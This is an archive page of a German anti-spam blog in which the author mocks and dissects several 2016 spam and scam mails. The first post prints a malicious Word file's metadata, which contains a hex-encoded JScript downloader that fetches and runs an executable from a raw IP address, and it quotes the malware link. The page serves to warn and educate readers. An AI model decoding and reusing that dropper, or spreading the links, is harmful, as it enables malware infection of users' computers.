Autorenarchiv

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
„Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

ACHTUNG! – E-MAIL NUR FÜR !

Freitag, 12. August 2016

Für was? Für die Mülltonne?

Hallo,

Nicht ganz mein Name.

Nicht Verpassen gammelfleisch@tamagothi.de !!

Auch nicht mein Name.

Mit diesem freundlichen Verbrauchtwagenverkäufer vor einem Klapprechner habe ich auch nichts zu tun, ebensowenig mit der würdelos gealterten Opferfrau, die ihm an den Lippen hängt, wenn er seine Lügen erzählt und dazu mit irgendwelchen Zetteln rumwedelt.

Sie sind dabei Sie wurden
persönlich ausgewählt es zu bekommen vor all den
anderen…

Ein „persönlich ausgewählt“ in einer völlig unpersönlich formulierten Mail wirkt fast so überzeugend wie ein Foto im Stile einer Siebziger-Jahre-Reklame.

PLUS Sie
werden eine erhebliche Summe als Willkommen-Geschenk bekommen

Wie? Bargeld? Mit dem ich Lakritz kaufen kann? Oder doch eher so etwas wie die virtuellen Jetons eines Abzockcasinos, die man dafür zusätzlich bekommt, dass man echtes Geld in virtuelle Jetons eintauscht – so dass man gleich bemerkt, wie wenig Wert die auf dem Computer angezeigte Zahl in Wirklichkeit hat.

Aber hey, jemand wird schon anbeißen, wenn so lecker lecker Geld am Angelhaken hängt. Und dann…

Holen Sie es sich sofort
hier unten

http://trend-trader.net/de/?p=[ID entfernt]

…wird klicki klicki ganz unten zugeschnappt… ähm… geklickt.

Es handelt sich um eine HTML-formatierte Spam, und der Link geht nicht etwa auf die URI, die im Text sichtbar ist, sondern in die Domain graccu.com, die schon vor längerer Zeit mit der Anschrift eines Trend-Spammers aus dem brummenden Tirana registriert wurde. Wer sich einmal die Startseite der Website in dieser Domain anschauen möchte, wird allerdings nicht mit Geld willkommen geheißen, sondern…

$ lynx -mime_header http://graccu.com/
HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2016 07:52:42 GMT
Server: Apache
Location: http://tradingdroid.net/
Content-Length: 232
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://tradingdroid.net/">here</a>.</p>
</body></html>
$ _

…weitergeleitet, um dann zu lesen…

$ lynx -mime_header http://tradingdroid.net/
HTTP/1.1 200 OK
Date: Fri, 12 Aug 2016 07:53:29 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Thu, 11 Aug 2016 12:05:37 GMT
ETag: "6a0fbc-f-539ca9571e640"
Accept-Ranges: bytes
Content-Length: 15
Connection: close
Content-Type: text/html

GET OUT OF HERE
$ _

…dass er sich verpissen soll.

Die Domain tradingdroid (punkt) net ist übrigens in allen Blacklists dieser Welt wegen Spam wohlbekannt:

Deshalb wird sie auch nicht direkt verlinkt, denn sonst käme die Spam ja bei niemanden mehr an. Es ist übrigens auch für Laien sehr einfach, über die SURBL-Website für eine Domain zu prüfen, ob sie in SURBL-Listen enthalten ist. Die einzige „technische“ Herausforderung besteht darin, ein Captcha zu lösen. Wer keine Captchas lösen will oder kann (zum Beispiel werden Blinde mit solchen Scheinsicherungen ausgesperrt), kann immer noch die technische Schnittstelle verwenden und über eine DNS-Abfrage prüfen, ob eine Domain in einer SURBL-Liste enthalten ist:

$ dig tradingdroid.net.multi.surbl.org | sed -e '/^;/d' -e '/^\s*$/d'
tradingdroid.net.multi.surbl.org. 114 IN A	127.0.0.64
$ _

Die 64 steht für die ABUSE-Liste¹ – und die beiden regulären Ausdrücke für sed entfernen eine Menge in diesem Kontext nur störender Zusatzangaben und Kommentare. Ob es für blinde und schwer körperbehinderte Menschen zumutbar ist, eine derartige technische Schnittstelle benutzen zu müssen, um kurz nachzuschauen, ob eine Domain koscher ist? Meiner Meinung nach nicht. Captchas sind immer eine schlechte Idee. Zum Glück ist auf den meisten Mailservern ein Spamfilter installiert, der solche Abfragen automatisch durchführt und Mails mit derartigen Links ausfiltert.

Um zu sehen, was einem in dieser massiv spambeworbenen Domain für tolle Trend-Betrügereien angeboten werden, muss man schon den Link aus der Spam mit allen Parametern verwenden. Wer das mit einer modernen Mailsoftware macht, bekommt vorher noch eine deutliche Warnung zu sehen:

Wie es zu dieser Warnung kommt? Nun, es gibt keinen einzigen legitimen Grund, einen Linktext zu schreiben, der wie eine URI aussieht, aber einen Link in eine völlig andere Domain zu setzen. Nur Kriminelle haben solche Irreführungen nötig. Leider sind es ausgerechnet die unerfahrenen und naiven Internetnutzer, die zwar eine solche Warnung dringend nötig hätten, aber davor zurückscheuen, ihre E-Mail mit einer guten Mailsoftware zu machen. Stattdessen verwenden sie lieber die „bequemen“ Webmailer ihres E-Mail-Providers. Weil sie Angst haben, dass sie mit der „komplizierten“ Einrichtung einer guten Software überfordert wären, obwohl sie im Regelfall wirklich sehr einfach ist. Ich kann nur dazu auffordern, einfach mal den Thunderbird auszuprobieren. Schon nach wenigen Tagen wird man nichts anderes mehr verwenden wollen.

Aber die Menschen, die dieser Aufforderung noch bedürfen, haben sich vermutlich schon beim Anblick meiner „Kommandozeilenakrobatik“ mit Grauen abgewendet. 🙁

Nach derart langer Vorrede mit vielen Abschweifungen jetzt endlich zur Hauptsache: Was will mir der freundliche Spammer hier anbieten? Oh, er hat eine völlig neue Methode, mit der jede amputierte Laborratte vollautomatisch durch Handel mit hochspekulativen Wettzetteln der Marke „Binäre Option“ eine Menge Geld machen kann. Oder, um es mit den Worten der tollen Website zu sagen: „Der Hauptalgorithmus des TREND TRADERS ist auf wiederholenden Mustern basiert, erkannt von unseren Finanzdatenbanken, entwickelt worden!“. Tja, es ist schon ein bisschen schade, wenn man eine Methode hat, um einfach an der Börse Geld zu erzeugen, aber die paar Euro fuffzig für einen richtigen Dolmetscher nicht erübrigen mag.

Die spambeworbene Betrügerseite sieht übrigens so aus:

Sehr überzeugend! Was man nicht braucht, ist Schulbildung. Wer würde da nicht sofort seine BESTE E-MAIL-ADRESSE eingeben?!

Nicht Verpassen
info@plethoraonline.com !!

Apropos E-Mail-Adresse… das ist aber nicht meine. Offenbar ist der geniale Reichwerdexperte mit seiner tollen automatischen Handelssoftware für hochspekulative Wettzettel nicht dazu imstande, ein Spamskript so zu schreiben, dass es fehlerfrei ist. Aber dafür ist ganz sicher die Software fehlerfrei. Muss man nur ganz feste dran glauben. Dann stimmt es auch. 😀

Dies ist kein falscher Ausdruck aber es
steht zu Verfügung nur für die ersten Wenigen.

Es wird an dem nächsten Benutzer
verschenkt wenn Sie es nicht nehmen

Wie, kein falscher Ausdruck. Ich habe doch gar nichts gedruckt. Und dafür, dass das ganze Binäre-Optionen-Zeug so immer so gut und schnell weggeht, bekomme ich aber immer ganz schön viel Spam dafür. (Wer einmal die gesamte, in meinem Spameingang geschehene Geschichte der Binäre-Optionen-Nummer verfolgen möchte, lege sich eine Familienportion Popcorn bereit und klicke mutig auf den Link!) Einmal ganz davon abgesehen, dass es ohne Spam überhaupt nicht wegzugehen scheint. Wer hat denn schon Interesse an Geld?

Wir
sprechen uns bald

Oh, ich würde so gern mal mit dir sprechen, Spammer. Meine Gesprächsführung wäre zwar ein allumfassender Verstoß gegen die Erklärung der Menschenrechte, aber so ein Geschmeiß wie du ist ja auch eher im biologischen Sinn des Wortes ein Mensch, nicht in irgendeinem höheren… 👿

Wolfgang Büttner

Ein Name, so echt wie die lustigen Behauptungen aus der Spam.

¹Es ist in Wirklichkeit noch ein bisschen „schlimmer“. In der Zahl ist bitweise codiert, auf welchen Listen eine Domain erscheint. Diese Schnittstelle ist für Programme gedacht, nicht für die direkte Benutzung durch Menschen. Wer GNU/Linux benutzt und häufiger solche Abfragen machen möchte, wird vielleicht dieses kleine Shellskript mögen.

loan

Mittwoch, 10. August 2016

So nannte sich der Vollidiot, der den folgenden Kommentar eigenhändig über die Zwischenablage ins Kommentarfeld hier bei Unser täglich Spam kopierte und absendete – und aus rein inhaltlichen Gründen doch nicht am Spamfilter vorbei kam¹:

Zeugnis eines Darlehens
Ich schaffte es ein Darlehen von einer Mikrokreditinstitut zu bekommen,
wer konnte mich schnell zu treffen.
Sie half mir, eine Summe von 45.000 € zu leihen.
Wenn Sie brauchen auch einen Kredit, Darlehen oder Sie sind nicht Banking erlaubt,
Ps: Bitte kontaktieren Sie per E-Mail, wenn Sie in der Notwendigkeit eines Darlehens sind.
Hier ist seine E-Mail: loanserious (at) gmail (punkt) com
Teilen Sie diese Informationen unseren Brüdern zu helfen, unsere Freunde und andere Menschen in Not.

Gerne teile ich das! Wer allen Ernstes daran glaubt, dass man ein Darlehen über sprachhumpelnde Spamkommentare in irgendwelchen Blogs bekommen kann, darf gern seinen „Kreditantrag“ an eine kostenlos und recht anonym eingerichtete Mailadresse beim Freemail-Dienst von Google senden und danach insgesamt ein paar hundert Euro Vorleistungen aller Art über Western Union an die Vorschussbetrüger mit der müden Nummer senden, die dann von diesen Betrügern mit großer Freude ins nächste Bordell getragen werden. Ja, vollständig anonym über Western Union – denn diese extratollen „Kreditinstitute“ mit ihren Spamdarlehen verwenden wegen ihrer Allergie gegen Handschellen und Gitterfenster niemals richtige Bankkonten. Aber bitte schnell machen! Die Mailadresse wird in wenigen Stunden nicht mehr existieren. Auch Google geht gegen solche Verbrecher vor, wenn man dort einen Hinweis gibt.

Schließlich kann man etwas gegen die Spammer tun.

Gegen die Dummheit einiger Menschen – die Darlehens-Masche läuft seit Jahren auf allen nur denkbaren Spamkanälen, und sie scheint immer noch ihre Opfer zu finden – habe ich leider noch kein Mittel… 🙁

¹Spamfilterung in einem Blog wie diesem ist gar nicht so eine einfache Sache, denn hier werden häufig Zitate aus Spams gepostet, die keine Spam, sondern sinnvolle Kommentare sind. Das bei vielen Bloggern beliebte Akisment kann ich hier nicht verwenden – was ich aber nicht weiter schlimm finde, weil ich das mit Akismet verbundene Datenschutzproblem (Namen, Mailadressen, IP-Adressen und Kommentartexte gehen an einen zentralen Anbieter, dessen Sorgfalt geglaubt werden muss) sowieso vermeiden möchte. Stattdessen leistet hier die Antispam Bee tägliche Schwerarbeit – gut, dass es eine Software ist, denn der davon aussortierte Müll ist menschenunwürdig. Dies wird ja nach Tagesaufkommen und aktuellen Spamwellen um weitere Maßnahmen ergänzt. An Tagen, an denen es „ganz hart“ kommt, verwende ich auch vorübergehend IP-basiertes Geoblocking für die Kommentarfunktion – denn ich habe kaum „echte“ Kommentare aus China, Nigeria, Russland, Bjelorussland oder der Ukraine. Striktes Geoblocking, das nur Kommentare aus der BRD, aus Österreich und der Schweiz durchlässt, reduziert hier übrigens das Kommentarspam-Aufkommen auf zwei bis drei Spams pro Woche statt mehreren hundert pro Tag. Es ist allerdings nicht als Dauerlösung empfehlenswert, denn es wehrt auch Menschen ab, die im Ausland leben, die Urlaub machen, die aus irgendwelchen Gründen Proxy-Server im Ausland oder ein VPN verwenden oder die ihre Webnutzung mit Tor anonymisieren und vor Überwachung und Zensur schützen. Ich möchte Spammer blockieren, nicht Menschen. Und nein, Spammer sind keine Menschen, außer vielleicht in einem strikt biologischen Sinn des Wortes…

Hast morgen Lust auf FKK-Baden?

Mittwoch, 10. August 2016

Hey,

Genau mein Name!

ich habe in Deinem Flirtprofil gesehen […]

Erstens habe ich kein „Flirtprofil“, und zweitens: Wenn ich eines hätte, stünde ein Name dabei, mit dem man mich ansprechen kann. Also ein anderer als „Hey“.

[…] dass wir gar nicht weit auseinanderwohnen.

Stimmt, im Internet spielen Entfernungen nicht so eine große Rolle.

Wenn ich Deine Fotos so anschaue […]

Zumindest ich achte aus vielerlei Gründen sehr genau darauf, dass es nur wenig Fotos von mir im Internet gibt, auf denen man mich auch erkennen kann. Das geht so weit, dass ich andere Menschen dazu auffordere, mich nicht zu fotografieren, obwohl die mich dann oft für ein bisschen irre halten. Deshalb kannst du keine Fotos von mir gesehen haben. Außer vielleicht dieses hier. Und ich glaube nicht, dass dich das so anmacht…

[…] wollte ich Dich fragen, ob Du Lust auf Sauna und FKK-Baden morgen hast?

…dass du jetzt unbedingt entblößt mit mir beisammen sein willst.

In dem neuen Bad das sie an der Autobahn gebaut haben wäre das morgen…

Oh, wie romantisch! An der Autobahn! 😯

Vielleicht geht ja noch mehr mit uns?

Aber nur im Schlamm. 😈

Ich bin 24, Blond, Cup 90C und habe 2 Piercings. Wo die sind siehst Du hier:
Schau Dir einfach mein Profil an:

http://www.versand79.faith/[ID entfernt]/Isabelle24/

Nun, dein „Profil“ ist einmal der Affiliate-Dating-Betrug, diemal in der Domain my (strich) funbook (punkt) com. Dort erfährt man angeblich, wie man jeden Tag eine andere knallt. Wer darauf reinfällt, ist hinterher Kunde bei einem äußerst fragwürdigen Dating-Fleischmarkt für das kostenpflichtige Kopfkino beim Gerubbel; der Spammer kassiert dafür Affiliate-Judasgroschen.

Bussi
Isabelle

Du mich auch!

Beitragsrückerstattung

Montag, 8. August 2016

Eine Konstante im täglichen Spameingang sind angebliche Versicherungsvergleiche. Allerdings sind die recht miesen und einfallslosen Spams in der Regel keines weiteren Kommentares würdig. Auch die heutige Spam – die übrigens binnen weniger Minuten drei Mal auf die gleiche Mailadresse zugestellt wurde, weil die Spammer noch kein Kind gefunden haben, das ihnen mal erklärt, wie man Dubletten aus dem Datenbestand rausbekommt – ist nichts Besonderes, sondern entspricht dem hirnlosen Standard

Guten Tag Elias ,

Immerhin, der Name stimmt mal.

viele Gesellschaften konnten dank Ihrer Gewinne in 2016 für das aktuelle Jahr die Beiträge senken […]

Was für Gesellschaften sind hier gemeint? Karnevalsvereine? Nun, damit hätte ich nichts zu tun.

[…] – die Kunden dieser Anbieter sparen jeden Monat Geld.

Worum immer es auch geht, es geht um Geld! Und weil der Gedanke an Geld so viele Menschen so dumm macht, dass sie dumm genug sind, in eine Spam zu klicken…

Sie auch? Oder hat Ihre Versicherung die Vorteile nicht an Sie weitergegeben?

http://www.clickserver101.science/[ID entfernt]/

…gibt es hier die Gelegenheit, in eine Spam zu klicken.

Prüfen Sie auf unserer Infoseite, wie fair Ihre Versicherung ist – und was Sie bei anderen Anbietern bezahlen würden.

Auf diese nicht direkt verlinkte „Infoseite“ komme ich gleich noch etwas ausführlicher zurück.

Oft kann Ihr monatlicher Beitrag schnell und einfach gesenkt werden.

Und falls es beim ersten Mal noch nicht geklappt hat (übrigens ist bis jetzt aus dem Text völlig unklar geblieben, um welche Art der Versicherung es geht), kommt der „Trick“ gleich noch mal. Es geht um Geld! Deshalb bitte ganz schnell…

Der Vergleich ist unverbindlich und kostenlos, er dauert nur wenige Minuten.

Vergleichen Sie jetzt:

http://www.clickserver101.science/[ID entfernt]/

…klicki klicki in eine Spam machen!

Mit freundlichen Grüßen,

Angelina Frank
Kundenservice

Freundlich wie eine ausgekippte Mülltonne im Wohnzimmer
Dein Versicherungsvergleich-Spammer

http://www.clickserver101.science/abm/[ID entfernt]/

Egal, wo du klickst, Opfer, du funkst über die eindeutige ID an uns zurück, dass die Spam bei dir angekommen ist und von dir beklickt wird. So etwas wissen wir gern. Wir sind schließlich Spammer.

Die vor kurzem neu eingeführte TLD .science hat natürlich keinen Whois-Dienst¹, so dass ich nicht abfragen kann, welche lustigen Daten sich der Spammer beim Registrieren dieser Domain ausgedacht hat. Zurzeit wird der verwendete Server von einem Düsseldorfer Dienstleister gehostet, dem ich von Herzen wünsche, dass er Vorkasse genommen hat.

Natürlich ist der Server eine reine Weiterleitungsschleuder, schnell aufgebaut und schnell wieder weggeschmissen, wenn er in allen Blacklists dieser Welt bekannt und damit für Spammer unbrauchbar geworden ist. Die Weiterleitung funktioniert auch ohne Angabe der ID aus dem Link und führt immerhin einmal direkt zum Ziel.

$ lynx -mime_header http://www.clickserver101.science/ | sed '/^\s*$/q'
HTTP/1.1 301 Moved Permanently
Date: Mon, 08 Aug 2016 13:52:33 GMT
Server: Apache/2.4.10 (Debian)
Location: http://www.aktuelle-pkv-tarife.com/
Connection: close
Content-Length: 3
Content-Type: text/html; charset=UTF-8

$ _

Die Domain aktuelle (strich) pkv (strich) tarife (punkt) com wurde über einen bei Spammern sehr beliebten Dienstleister aus dem sonnigen Panama anonym registriert:

$ whois aktuelle-pkv-tarife.com | grep '^Registrant'
Registrant Name: WHOISGUARD PROTECTED
Registrant Organization: WHOISGUARD, INC.
Registrant Street: P.O. BOX 0823-03411
Registrant City: PANAMA
Registrant State/Province: PANAMA
Registrant Postal Code: 00000
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext: 
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 4773CBB0FDA74AB8ABCD72AA9F22675D.PROTECT@WHOISGUARD.COM
$ _

Niemand verstehe mich falsch! Die Verwendung eines Whois-Anonymisierers und die damit verbundene Weigerung, private Daten wie einen Namen, eine Anschrift, eine Telefonnummer und eine Mailadresse für den Zugriff aus der ganzen Welt zu veröffentlichen, kann eine sehr sinnvolle Maßnahme zum Datenschutz sein. Jedem Menschen, der eine Website in einer eigenen Domain betreiben will und der nicht möchte, dass seine persönlichen Daten für jeden kriminellen Missbrauch offenliegen, kann ich die Nutzung derartiger Dienstleister nur wärmstens nahelegen. So etwas ist nicht an sich verdächtig.

Es wird aber sehr verdächtig bei gewerblichen Websites, die sowieso ein Impressum haben müssen. Die Worte „sehr verdächtig“ meinen hier: Es ist immer ein ganz schlechtes Zeichen. Übrigens genau wie Spam. Die ist auch immer ein ganz schlechtes Zeichen. Wer auf seiner gewerblichen Website ein halbwegs ehrliches Geschäft machen will, hat solcherart Mummenschanz nicht nötig.

Wer auf so einer Website dann…

…genügend Daten für einen kriminellen Identitätsmissbrauch eingibt, weil ihm ein Spammer gesagt hat, dass er Geld sparen kann, der lasse alle Hoffnung fahren.

Das Design dieser tollen Betrugsseite ist ja schon etwas älter und der Spammer hat es auch nicht eingesehen, dass man etwas daran ändern sollte. Die Angaben zum Copyright sind in diesem Kontext…

…allerdings ein bisschen realsatirisch und sollten auch weniger gründlichen Lesern klar machen, dass es sich hier um das Machwerk eines Menschen handelt, der sich nicht einmal besonders viel Mühe geben will. Denn wenn der Spammer sich Mühe geben wollte, dann könnte er doch gleich arbeiten gehen. Die dort als stolzer Besitzer des „geistgen Eigentumes“ angegebene Domain tarifvergleich (strich) 2015 (punkt) com existiert inzwischen gar nicht mehr.

Aber dafür, dass diese Seite angeblich seit 2014 existiert…

tarifvergleich-aktuell.com ist ein Angebot von -- Aktuelle PKV-Tarife GmbH -- Rosenstrasse 93 -- 81517 München -- Geschäftsführer: Paul Walter -- Umsatzsteuer-ID: beantragt -- Steuernummer: beantragt -- E-Mail: info@aktuelle-pkv-tarife.com

…zieht sich die Vergabe einer Steuernummer aber ganz schön hin!

Aufmerksame Leser werden sicherlich gemerkt haben, dass hier jetzt schon die zweite Domain steht, die nichts mit der aktuell verwendeten Domain für diesen Beschiss zu tun hat. Denn wenn der Spammer sich Mühe geben würde… ach! Ich wiederhole mich.

Wer die Entwicklung dieser Nummer in den letzten sechseinhalb Jahren verfolgen möchte: Hier auf Unser täglich Spam gibt es ein Schlagwort „Krankenversicherung“ zum bequemen Durchstöbern. Viel Spaß!

¹Ich bin drauf und dran, sämtliche derartigen Top-Level-Domains als sicheres Anzeichen für Spam zu betrachten. Ich sehe sie zurzeit ausschließlich in Spam. Die einzigen, die einen entsprechenden Bedarf an neuen Domains wirklich gehabt zu haben scheinen, waren Kriminelle.

Re: FOLLOW UP…

Sonntag, 7. August 2016

Oh, was ist mir denn da auf der webmaster-Adresse einer von mir betreuten Domain ins Postfach geflattert? Ein ganz tolles Angebot eines Menschen, der meinen Auftritt im Web noch erfolgreicher machen will.

Natürlich ist der Absender dieser Spam gefälscht, und die Antwort…

Antwort an: info (strich) usa (at) mailbox (punkt) wewelcomeyou2020 (punkt) ru

…geht gewissermaßen in die russische USA.

Nee, Spammer, ich antworte dir lieber hier. Das ist auch viel unterhaltsamer für meine Leser, die ich übrigens auch völlig ohne deine SEO-Kunststücke habe.

Die Absätze und Zeilenumbrüche im folgenden Zitat sind original, das gleiche gilt für die lustigen im Text verstreuten Zeichen, die als Mahnmal missglückter Textkonvertierung daran gemahnen, dass es keine Alternative zu recode(1) gibt – und natürlich um das bisschen Wissen, wie man damit umgeht.

ï»¿FOLLOW UP.

Greetings, my name is Matthew Craig and I am an agency account executive with one of

the industryâs most trusted SEO agencies here in the US. I sent you an email earlier this

week to say hello and see if you would be interested in hearing about a few proven

methods that we use to find added profits for businesses. We do this by putting a few

proven methods in place that activate relationships with customers in your exact target

market â we put you in front of them fast.

What sets us apart from all of the other SEO companies whose emails land in your inbox?

Simple â we focus on finding the exact ways we can add profits for your business,

through our innovative approach to organic on-line marketing. We bring the following to

your business:

ï· Expert Methodology to Achieve Increased Online Profits for Your Business

ï· No contract, no obligation model

ï· Monthly plans you can actually afford!

ï· The best client services in the industry

How to get started? Simple. I am extending to you our offer of a no-obligation SEO

consultation and strategic analysis. The process only takes a few minutes to get started,

and is the first step to realizing improved profits for your business through our unique

approach to SEO.

Please let me know when there is a convenient time for us to chat briefly, and we can get

started on your analysis from there.

I look forward to chatting with you soon!

Best regards,

Matt

Matthew Craig

Senior Account Strategist

So so, Matt, du spammender Vollidiot,

du willst also ein ganz großer Web-Magier sein, viel besser, als alle anderen SEO-Klitschen in meinem Spameingang. Voll von technischer Kompedingsda und dem Wissen, wie man hokus pokus jede noch so entbehrliche Dreckssite in Google nach oben zaubert, auf dass die Leute kommen und das Geld mitbringen (oder wenigstens ein paar Werbebanner klicken). Und dann schaffst du es nicht einmal, eine popelige Plaintext-E-Mail unfallfrei zu formatieren…

Du kannst dir gar nicht vorstellen, wie überzeugend dein Angebot ist.

Oh, und du bietest SEO an. Weil das jetzt echt gut für die Kundenakquise ist, wenn man in Google-Ergebnissen weit oben steht. Aber für deine eigene Reklame setzt du nicht etwa auf deine eigenen, großartigen, besser-als-bei-allen-anderen-seienden Fähigkeiten, sondern versendest illegale und asoziale Spam. Die mit diesem Vorgehen verbundene unfreiwillige Selbsteinschätzung deiner Fähigkeiten teile ich vollständig.

Ja. Ich bin völlig überzeugt davon, dass du ein krimineller Vollidiot und ein technischer Nichtskönner bist.

Dein dich „genießen“ müssender
Nachtwächter

Weia, was für eine schlechte Spam!

Hast Du mein Paket angenommen?

Samstag, 6. August 2016

Holla, fragen mich heute viele „Frauen“ in fast völlig gleichlautenden Spams danach, ob ich ihr Paket angenommen habe. Der arme Paketbote…

Hi!

Genau mein Name!

Ich bin Deine neue Nachbarin, ich hab mir die Tage ein paar nette Sachen im Internet bestellt. Ich habe gerade die Mail bekommen dass der Shop das Paket bei euch zugestellt hat.

Nun, wenn du wirklich eine derartige Mail bekommen hättest, dann wüsstest du von mir einen anderen Namen als „Hi“. Hast du aber nicht. Das ist nur eine Geschichte, mit der du Leute zum Rumklicken in einer Spam motivieren willst. Und damit das noch ein bisschen besser wirkt…

Magst Du mir das heute Abend rüberbringen? Da sind ein paar Erwachsenen-Spielzeuge mit drin

…spielst du asozialer und krimineller Spammer (der du gewiss keine Frau bist) die lebensfrohe Frau mit heiterem Spielzeug für Erwachsene zum wohligen Einführen in aufnahmebereite Leibespforten.

Naive Männer, denen von dieser Vorstellung das ganze Blut in den Schwellkörper fließt (und so im Hirne fehlt), sollen dann zum Klick auf einen Link motiviert werden, um mal zu sehen, wie so ein Paket ausgepackt wird (und sich dabei vorstellen, dass das ihre Nachbarin ist):

Hier mal n heisses Video wie ich meine letzte Bestellung auspacke:

http://www.server213.win/[ID entfernt]/

Natürlich ist das eine Wegwerfdomain.

Natürlich gibt es da auch kein Video.

Wenn ich die ID aus der URI entferne, gibts auch keine Weiterleitung zu irgendetwas heißem, sondern es geht zu einer Pimmelpillen-Apotheke:

$ lynx -mime_header http://www.server213.win/ | sed '/^\s*$/q'
HTTP/1.1 301 Moved Permanently
Date: Sat, 06 Aug 2016 10:11:42 GMT
Server: Apache/2.4.10 (Debian)
Location: http://www.offizieller-generikashop.com
Connection: close
Content-Length: 3
Content-Type: text/html; charset=UTF-8

$ _

Dabei handelt es sich um eine Website von Giftapothekern, über die ich mich schon im Januar dieses Jahres ein wenig ausgelassen habe.

